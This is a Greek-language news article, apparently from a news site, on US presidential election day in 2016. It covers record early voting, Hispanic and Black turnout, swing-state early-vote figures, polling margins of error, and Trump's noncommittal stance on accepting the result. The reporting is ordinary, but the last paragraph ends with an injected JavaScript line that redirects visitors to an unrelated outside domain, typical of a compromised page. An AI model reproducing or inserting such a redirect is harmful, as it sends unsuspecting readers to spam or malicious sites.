Η Αμερική επιλέγει τον επόμενο Πλανητάρχη-Όλες οι εξελίξεις

0
16

 

  Περίπου 225 εκατομμύρια Αμερικανοί ψηφοφόροι καλούνται να επιλέξουν τον διάδοχο του Μπαράκ Ομπάμα στον Λευκό Οίκο.
Το όνομα του νικητή των προεδρικών εκλογών δεν αναμένεται να γίνει γνωστό πριν από τις 05:00 (ώρα Ελλάδας) το πρωί της Τετάρτης.

Οι δημοσκοπήσεις αν και έδιναν προβάδισμα στην Κλίντον, η διαφορά κινείται στο όριο του στατιστικού λάθους.

Αριθμός ρεκόρ Αμερικανών έχει ψηφίσει στην πρώιμη ψηφοφορία των εκλογών στις ΗΠΑ, ενώ η παρατηρούμενη υψηλή κινητοποίηση της κοινότητας των ισπανόφωνων μπορεί να είναι ενθαρρυντικό στοιχείο για τη Χίλαρι Κλίντον.

Τουλάχιστον 46,27 εκατομμύρια ψηφοφόροι έχουν ήδη ψηφίσει, με επιστολική ψήφο ή στα εκλογικά τμήματα, σύμφωνα με στοιχεία του Associated Press, ξεπερνώντας τα επίπεδα του 2012. Επίπεδα ρεκόρ συμμετοχής έχουν καταγραφεί σε 28 πολιτείες και στην Περιφέρεια της Κολούμπια, ενώ εκατομμύρια ψήφοι δεν έχουν ακόμη καταμετρηθεί.

Σύμφωνα με τις εκτιμήσεις του AP, η συμμετοχή στην πρώιμη ψηφοφορία μπορεί να ξεπεράσει τα 50 εκατομμύρια, που αντιστοιχεί στο 40% των ψηφοδελτίων της ψηφοφορίας. Τέσσερα χρόνια πριν, 46,22 εκατομμύρια ψηφοφόροι είχαν συμμετάσχει στην πρώιμη ψηφοφορία, που αντιστοιχούν στο 35% του συνόλου των ψηφοδελτίων.

Οι πρόωρες ψήφοι
Πάνω από 41 εκατομμύρια Αμερικανοί έχουν ήδη ασκήσει το εκλογικό τους δικαίωμα. Ορισμένες από τις δημοσκοπήσεις?όχι όλες ασφαλώς?συμπεριλαμβάνουν ψηφοφόρους που άσκησαν πρόωρα το εκλογικό τους δικαίωμα. Πάνω από το ένα τρίτο των ερωτηθέντων σε μια δημοσκόπηση που μετέδωσε το Bloomberg χθες απάντησε ότι έχει ήδη ψηφίσει. Η δημοσκόπηση αυτή κατέδειξε προβάδισμα της Κλίντον, με τρεις εκατοστιαίες μονάδες.

Υπάρχουν κι άλλες θετικές ενδείξεις για το στρατόπεδο της Κλίντον. Η συμμετοχή των ισπανόφωνων ψηφοφόρων εμφανίζεται αυξημένη σε κάθε πολιτεία για την οποία είναι διαθέσιμα δεδομένα σχετικά με την πρόωρη ψηφοφορία. Τα στοιχεία υποδεικνύουν πως όλο και περισσότεροι ισπανόφωνοι απαντούσαν στις δημοσκοπήσεις πως θα πάνε να ψηφίσουν, όσο οι εβδομάδες περνούσαν. Καθώς τα τρία τέταρτα των ισπανόφωνων Αμερικανών λένε ότι θα ψηφίσουν την Κλίντον, αυτή μάλλον είναι άσχημη εξέλιξη για τους Ρεπουμπλικάνους.

Όμως είναι πολύ πιο πολύπλοκο να εκτιμηθεί το πώς ή το κατά πόσον η αύξηση της συμμετοχής των ισπανόφωνων στην εκ των προτέρων ψηφοφορία θα αντισταθμίσει τη μείωση της συμμετοχής των Αφροαμερικανών 18-29 ετών σε αυτή τη φάση της ψηφοφορίας. Είναι επίσης πιθανό η συμπεριφορά των εκλογέων να εμφανίσει διαφοροποιήσεις. Μπορεί για παράδειγμα οι υποστηρικτές του Τραμπ να τείνουν στο να πάνε να ψηφίσουν την ημέρα των εκλογών και όχι να ψηφίσουν πρόωρα.

Στη Νεβάδα, όπου οι δημοσκοπήσεις υποδείκνυαν πως ο Τραμπ είχε προβάδισμα 1,5 εκατοστιαίας μονάδας, η πρόωρη ψηφοφορία υπεδείκνυε ότι αντιθέτως, θα μπορούσε να κερδίσει η Κλίντον. Πάνω από τους μισούς ψηφοφόρους έχουν ήδη ψηφίσει. Το 42% εξ αυτών είναι Δημοκρατικοί και το 36% Ρεπουμπλικάνοι.

Για να επικρατήσει στη Νεβάδα, ο Τραμπ θα χρειαστεί να συγκεντρώσει περισσότερες ψήφους ανεξάρτητων, δηλαδή να αντιστρέψει την τάση που είχε καταγραφεί τόσο το 2008, όσο και το 2012. Αυτό δεν αποκλείεται. Αλλά ίσως ο Τραμπ να το έχει ήδη ξεγράψει: καθώς στην πολιτεία θα κριθούν μόνο έξι εκλέκτορες, αυτό μπορεί να μην είναι τόσο κρίσιμο να συγκεντρωθεί ο αριθμός των 270 που απαιτούνται για τη νίκη.

Περισσότερες ψήφοι δεν σημαίνουν νίκη
Ιστορικά, η λαϊκή ψήφος (τα αποτελέσματα με βάση την καταμέτρηση όλων των ψηφοδελτίων) δεν μεταφράζεται στο πραγματικό αποτέλεσμα (τα αποτελέσματα όσον αφορά τις 538 ψήφους του εκλεκτορικού σώματος). Τέσσερις φορές?πιο πρόσφατα το 2000, στην αναμέτρηση του Τζορτζ Ουόκερ Μπους με τον Αλ Γκορ?ο νικητής των εκλογών εξασφάλισε μεν τους περισσότερους εκλέκτορες, αλλά όχι τις περισσότερες ψήφους.

Προφανώς αυτό έχει τη σημασία του. Ακόμη κι αν η Κλίντον εξασφαλίσει το 47% των ψήφων, δεν θα εξασφαλίσει το 47% των εκλεκτόρων. Το ποσοστό της στο εκλεκτορικό σώμα θα εξαρτηθεί από τον αριθμό των εκλεκτόρων που αναδεικνύει κάθε πολιτεία. Στο Μέριλαντ για παράδειγμα, φέρεται να συγκεντρώνει 63%, ενώ στο Άινταχο, περίπου 23%.

Κατά συνέπεια κάθε προσδιορισμός των «κρίσιμων» μαχών ανά πολιτεία πρέπει να λαμβάνει υπόψη δύο παράγοντες: ποια είναι η διαφορά, πόσοι εκλέκτορες αναδεικνύονται σε αυτή. Αν τα κριτήρια είναι 1) μια διαφορά έξι μονάδων ή μικρότερη και 2) η πολιτεία να αναδεικνύει 10 μέλη του εκλεκτορικού σώματος ή περισσότερα, οι κρίσιμες πολιτείες είναι οι ακόλουθες: η Φλόριντα, η Πενσιλβάνια, το Οχάιο, το Μίσιγκαν, η Τζόρτζια, η Βόρεια Καρολίνα, η Βιρτζίνια, η Αριζόνα, το Ουισκόνσιν και η Μινεσότα.

Βάσει των στοιχείων από την πρόωρη ψηφοφορία και του δεδομένου ότι ο ένας στους πέντε ψηφοφόρους είναι ισπανόφωνος, στη Φλόριντα διαφαίνεται πιθανή μια νίκη της Κλίντον. Η επικράτησή της εκεί θα είναι σημαντική, καθώς η πολιτεία αναδεικνύει 29 εκλέκτορες, αλλά μπορεί να μην αποδειχθεί αρκετή. Ακόμα κι αν η Κλίντον προσθέσει τη Φλόριντα στις πολιτείες όπου η νίκη της θεωρείται σίγουρη, το άθροισμα φθάνει μόλις στους 216 εκλέκτορες από τους 270 που χρειάζεται για να επικρατήσει.

Το ποσοστό σφάλματος
Το ποσοστό στατιστικού λάθους είναι επίσης κρίσιμο. Συνήθως, όταν δημοσιεύεται μια δημοσκόπηση, στα ψιλά γράμματα βρίσκεται μια γραμμή που λέει κάτι σαν «ποσοστό σφάλματος ±3,5%», κάτι που σημαίνει για παράδειγμα ότι το πραγματικό ποσοστό της Κλίντον μπορεί να είναι 50,3% ή 43,3% στο καλύτερο και το χειρότερο σενάριο γι’ αυτήν.

Με δεδομένο το ότι οι δύο υποψήφιοι έχουν τόσο μικρή διαφορά, αυτό το ποσοστό σφάλματος μπορεί να κάνει τη διαφορά.

Αν το ποσοστό σφάλματος ευνοεί συστηματικά τον υποψήφιο που προηγείται ή αυτόν που έρχεται δεύτερος, αυτό θα μπορούσε να συμπεριληφθεί στους υπολογισμούς, όμως δεν συμβαίνει κάτι τέτοιο. Ένα χαρακτηριστικό παράδειγμα είναι ότι μια από τις πιο γνωστές εταιρείες του κλάδου, η Gallup, το 2012 είχε υπερτιμήσει το ποσοστό του Μπαράκ Ομπάμα κατά δύο εκατοστιαίες μονάδες. Το 2008, αντιθέτως, το είχε υποτιμήσει κατά δύο μονάδες.

Ο μέσος όρος συνάγεται με βάση τα αποτελέσματα των δημοσκοπήσεων που θεωρούνται αξιόπιστες και διενεργούνται σε παρόμοια χρονικά διαστήματα. Σπανίως λαμβάνεται υπόψη το πόσο αξιόπιστες έχουν αποδειχθεί στο παρελθόν οι εταιρείες που διεξήγαγαν τις έρευνες ή το εάν οι δημοσκόποι συμπεριέλαβαν στα δείγματά τους μειονοτικές ομάδες σε επαρκή βαθμό.

Είναι ενδεικτικό το ότι ενώ κατά το τηλεοπτικό δίκτυο NBC News η Κλίντον προηγείται με επτά εκατοστιαίες μονάδες, κατά την εφημερίδα Los Angeles Times προηγείται ο Τραμπ κατά πέντε μονάδες. Ωστόσο, κάτι ακόμη ενθαρρυντικό για την πρώην υπουργό Εξωτερικών είναι το ότι οι περισσότερες εταιρείες δημοσκοπήσεων που θεωρούνται αξιόπιστες καταγράφουν δικό της προβάδισμα.

Είναι ασυνήθιστο να καταγράφονται τόσο μεγάλες διαφοροποιήσεις στις δημοσκοπήσεις τόσο κοντά στις εκλογές στις ΗΠΑ, αλλά αυτές ασφαλώς είναι κάθε άλλο παρά συνηθισμένες εκλογές.

Τις επόμενες ώρες θα αναδειχθεί πάντως νικητής εκτός απροόπτου εκτός δηλαδή του αρκετά απίθανου σεναρίου της ισοπαλίας στο εκλεκτορικό σώμα (269-269) ή της ανακαταμέτρησης, οπότε η αναμονή θα παραταθεί.

Τα τελευταία στοιχεία δείχνουν μείωση της συμμετοχής των μαύρων ψηφοφόρων στη Βόρεια Καρολίνα, έπειτα από τα ιστορικά επίπεδα που σημειώθηκαν στην συμμετοχή της μαύρης κοινότητας που ψήφισε τον Μπαράκ Ομπάμα το 2008 και το 2012. Ομως η ενίσχυση της συμμετοχής της ισπανόφωνης κοινότητας , που συνήθως ψηφίζει το Δημοκρατικό Κόμμα, είναι ενθαρρυντική εξέλιξη για τη Χίλαρι Κλίντον. Για να κερδίσει τις εκλογές, ο Ντόναλντ Τραμπ πρέπει να νικήσει και στην Φλόριντα και στη Βόρεια Καρολίνα.

Η συμμετοχή των Ισπανόφωνων αυξάνεται επίσης στη Νεβάντα και το Κολοράντο, όπου οι Δημοκρατικοί βρίσκονται κάτω ή κοντά στα ποσοστά τους του 2012. Ο Τραμπ προηγείται στο Οχάιο και την Αϊόβα, αλλά αυτό δεν του αρκεί , εάν η ψήφος των ισπανόφωνων δώσει στη Χίλαρι Κλίντον τη νίκη σε άλλες πολιτείες.

Το επιτελείο του Τραμπ παραδέχεται ότι δεν μπορεί να νικήσει χωρίς τη Φλόριντα και τη Βόρεια Καρολίνα.

Στη Φλόριντα, αριθμός ρεκόρ 6,4 εκατομμυρίων ψηφοδελτίων έχουν ήδη κατατεθεί, δηλαδή περισσότερο από τα τρία τέταρτα των αν αναμενόμενων. Οι Δημοκρατικοί προηγούνται με 39,9-38,5%. Το 2008 και το 2012 είχαν ελαφρά υψηλότερα ποσοστά και ο Ομπάμπα κέρδισε οριακά τη Φλόριντα.

Αν και η συμμετοχή των μαύρων ψηφοφόρων είναι χαμηλότερη, οι ψήφοι των ισπανόφωνων έχει σχεδόν διπλασιαστεί σε περισσότερες από 976.000. Το ένα τρίτο από αυτούς δεν ψήφισαν το 2012, σύμφωνα με την ανάλυση του Ντάνιελ Σμιθ του Πανεπιστημίου της Φλόριντα. Αυτό είναι βοηθητικό για την Κλίντον.

Στη Βόρεια Καρολίνα, περισσότερα από τα δύο τρίτα των αναμενόμενων ψήφων έχουν ήδη πέσει στις κάλπες. Οι Δημοκρατικοί προηγούνται στην πρώιμη ψηφοφορία με 42%, έναντι 32% για τον Τραμπ. Στις δημοσκοπήσεις, οι Ρεπουμπλικανοί εξασφαλίζουν υψηλότερα ποσοστά από την επίδοση του Μιτ Ρόμνεϊ το 2012, όταν ο ρεπουμπλικανός υποψήφιος κέρδισε οριακά τη Βόρεια Καρολίνα.

Σύμφωνα με τον Σκοτ Τραντερ, του Optimus, το αποτέλεσμα μπορεί να εξαρτηθεί από τους ανένταχτους ψηφοφόρους ή εκείνους που δεν έχουν σταθερή εκλογική συμπεριφορά.

Δεν είναι σαφές εάν ο Τραμπ μπορεί να εξασφαλίσει το 90% της ρεπουμπλικανικής ψήφου στη Βόρεια Καρολίνα.

Η επιστολική ψήφος στο Κολοράντο, δίνει προβάδισμα στους Ρεπουμπλικάνους

Οι εγγεγραμμένοι Ρεπουμπλικάνοι ξεπέρασαν αριθμητικά τους Δημοκρατικούς, αναφορικά με τον αριθμό των ψηφοφόρων που άσκησαν το εκλογικό τους δικαίωμα, στο Κολοράντο, σχολιάζει το CNN.

Παρά το γεγονός ότι οι αριθμοί δείχνουν ότι οι Ρεπουμπλικάνοι έχουν θετική πολιτική δυναμική στην αναφερόμενη πολιτεία, η δυναμική τους δεν έχει φτάσει στο επίπεδο της πολιτικής δυναμικής που είχαν το 2012, χωρίς ωστόσο να εξασφαλίσουν τη νίκη στον (τότε) προεδρικό υποψήφιο Μιτ Ρόμνεϊ.

Η ψηφοφορία στο Κολοράντο πραγματοποιείται σχεδόν συνολικά φέτος, μέσω της επιστολικής ψήφου, για πρώτη χρονιά στην ιστορία των αμερικανικών προεκλογικών αναμετρήσεων. Τα ψηφοδέλτια άρχισαν ν’ αποστέλλονται στους εγγεγραμμένους ψηφοφόρους από τις 17 Οκτωβρίου, ενώ μέχρι σήμερα έχουν ψηφίσει περισσότεροι από 1,8 εκατομμύρια ψηφοφόρων.

Η ψηφοφορία γίνεται με δύο τρόπους. Είτε με την αποστολή επιστολής, είτε με την κατάθεση της επιστολικής ψήφου σε ένα εκλογικό κέντρο.

Κατά τη χθεσινή ημέρα ψήφισαν 652.380 Ρεπουμπλικάνοι και 645.020 Δημοκρατικοί, σύμφωνα με τα επίσημα στοιχεία των αρμόδιων αρχών στο Κολοράντο. Έτσι, οι Ρεπουμπλικάνοι προηγούνται με 7.360 ψήφους, έναντι του προβαδίσματος των περίπου 31.000 ψήφων που είχαν την αντίστοιχη τελευταία ημέρα πριν από τις προεδρικές εκλογές του 2012.

Έτσι, παρά το γεγονός ότι οι Ρεπουμπλικάνοι προηγούνται, βρίσκονται ουσιαστικά πίσω από το εκλογικό αποτέλεσμα του 2012, στην αναφερόμενη πολιτεία σύμφωνα με το CNN.

Θετικές ενδείξεις για την Χίλαρι Κλίντον

Η ψήφος των Ισπανόφωνων μπορεί να δώσει ώθηση στην Κλίντον στις δυτικές πολιτείες. Στη Νεβάντα, περισσότερο από τρία τέταρτα των αναμενόμενων ψήφων βρίσκεται ήδη στις κάλπες. Οι Δημοκρατικοί προηγούνται με 42% έναντι 36%. Η κατάσταση είναι συγκρίσιμη με το 2012, όταν ο Ομπάμα κέρδισε την πολιτεία με 6 ποσοστιαίες μονάδες. Η συμμετοχή των Ισπανόφωνων και των Ασιατών-Αμερικανών είναι αυξημένη κατά διψήφιους αριθμούς, ενώ η συμμετοχή των μαύρων ψηφοφόρων είναι μειωμένη. Το μερίδιο της λευκής ψήφου έχει μειωθεί από το 77% στο 75%.

Στο Κολοράντο, οι δύο πλευρές βρίσκονται σε ισοπαλία στο 35%. Περισσότερο από το 70% των αναμενόμενων ψήφων βρίσκεται στις κάλπες.Την ίδια χρονική στιγμή το 2012, οι Ρεπουμπλικανοί είχαν το προβάδισμα.

Η Κλίντον ανθίσταται σε άλλες πολιτείες που έχει κερδίσει ο Ομπάμα και έχει ως στόχο ο Τραμπ.

Στη Βιρτζίνια, η πρώιμη ψήφος έχει ξεπεράσει τα επίπεδα του 2012 και η αύξηση εστιάζεται στις βόρειες κομητείες όπου επικρατούν οι Δημοκρατικοί.

Η συμμετοχή έχει ξεπεράσει επίσης τα επίπεδα του 2012 στο Ουισκόνσιν, όπου η αύξηση εντοπίζεται στις κομητείες Ντέιν και Μιλγουόκι, όπου επικρατούν οι Δημοκρατικοί.

Θετικές ενδείξεις για τον Τραμπ στο Οχάιο και την Αϊόβα

Ο Τραμπ διατηρεί ελαφρύ προβάδισμα στο Οχάιο και την Αϊόβα. Στην Αϊόβα, οι Δημοκρατικοί προηγούνται στην πρώιμη ψηφοφορία, με 41% έναντι 35%. Η απόσταση είναι μικρότερη από ό,τι το 2012. Οι Ρεπουμπλικανοί βρίσκονται στα επίπεδα του 2012, ενώ οι Δημοκρατικοί υπολείπονται. Ο Μπαράκ Ομπάμα είχε κερδίσει την πολιτεία με διαφορά πέντε ποσοστιαίων μονάδων.

Στο Οχάιο, τα στοιχεία που διαθέτει το Associated Press από το Catalist δείχνουν ότι η συμμετοχή των μαύρων ψηφοφόρων εξακολουθεί να υπολείπεται των επιπέδων του 2012. Η ψήφος των μαύρων αντιστοιχεί φέτος στο 9% της συνολικής ψήφου, έναντι του 12% το 2012, ενώ η λευκή ψήφος έχει αυξηθεί.

Στην πολιτεία της Τζόρτζια, η πρώιμη ψήφος έχει ξεπεράσει τα επίπεδα του 2012. Στο μερίδιο της συνολικής ψήφου, η συμμετοχή των λευκών έχει αυξηθεί από 63% το 2012, σε 66% και των μαύρων έχει μειωθεί από 36% το 2012, στο 30%.

Πόση ώθηση μπορεί να περιμένει η Κλίντον από τους ισπανόφωνους ψηφοφόρους

Η αύξηση της συμμετοχής των ισπανόφωνων ψηφοφόρων ευνοεί τους Δημοκρατικούς σε δύο πολιτείες-κλειδιά.

Στην Αριζόνα, όπου τα δύο τρίτα των αναμενόμενων ψηφοδελτίων βρίσκονται ήδη στις κάλπες, οι Ρεπουμπλικανοί προηγούνται με 40% έναντι 34%. Η διαφορά αυτή είναι μικρή σε σχέση με το 2012, όταν οι Ρεπουμπλικανοί είχαν προβάδισμα 10 ποσοστιαίων μονάδων.

Τουλάχιστον 4,5 εκατομμύρια ψήφοι βρίσκονται ήδη στις κάλπες στο Τέξας, μία άνοδος 32%. Σύμφωνα με τα στοιχεία του Catalist, διαπιστώνεται και εδώ αύξηση της συμμετοχής των ισπανόφωνων ψηφοφόρων.

Οι δημοσκοπήσεις δεν επέτρεψαν να εξαχθεί ασφαλές συμπέρασμα για το ποιος έχει το προβάδισμα

Μερικές ώρες πριν ανοίξουν σήμερα οι κάλπες στις ΗΠΑ, οι δημοσκοπήσεις έφεραν τη Χίλαρι Κλίντον να προηγείται, συγκεντρώνοντας το 46,8% της πρόθεσης ψήφου, ενώ ο Ντόναλντ Τραμπ βρισκόταν στο 44,3%.

Όταν οι αναλυτές μιλούν για το προβάδισμα 2,5 εκατοστιαίων μονάδων των Δημοκρατικών, αναφέρονται στη διαφορά των δύο υποψηφίων για την προεδρία στις δημοσκοπήσεις κατά μέσον όρο.

Αυτός είναι ένας σημαντικός αριθμός· πιθανόν όμως είναι ανακριβής, καθώς οι μέσοι όροι που συνάγονται από τα αποτελέσματα των δημοσκοπήσεων δεν λαμβάνουν υπόψη παράγοντες που ενδέχεται να επηρεάσουν καθοριστικά το αποτέλεσμα, τονίζει η Μόνα Τσάλαμπι, αναλύτρια της βρετανικής εφημερίδας Γκάρντιαν.

«Ας δούμε πώς θα εξελιχθούν τα πράγματα» η απάντηση Τραμπ στο ερώτημα εάν θα αποδεχθεί το αποτέλεσμα των εκλογών

Ο υποψήφιος του Ρεπουμπλικανικού Κόμματος για τον Λευκό Οίκο Ντόναλντ Τραμπ δήλωσε σήμερα ότι θα πρέπει να «δει πώς θα εξελιχθούν τα πράγματα» προτού αποδεχθεί τα αποτελέσματα των εκλογών, επικαλούμενος πιθανές παρατυπίες, ενώ προειδοποίησε για μία ακόμη φορά για ένα διάτρητο σύστημα.

«Θα δούμε πώς θα εξελιχθεί η κατάσταση απόψε. Ας ελπίσουμε ότι θα πάνε όλα καλά και ότι δεν θα πρέπει να ανησυχήσουμε σχετικά, ήτοι, ας ελπίσουμε ότι θα νικήσουμε» σημείωσε ο μεγιστάνας κατά τη διάρκειας μιας τηλεφωνικής συνέντευξης που παραχώρησε στο τηλεοπτικό δίκτυο Fox News.

«Θέλω να δω τα πάντα (να διέπονται) από τιμιότητα» πρόσθεσε ο ίδιος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here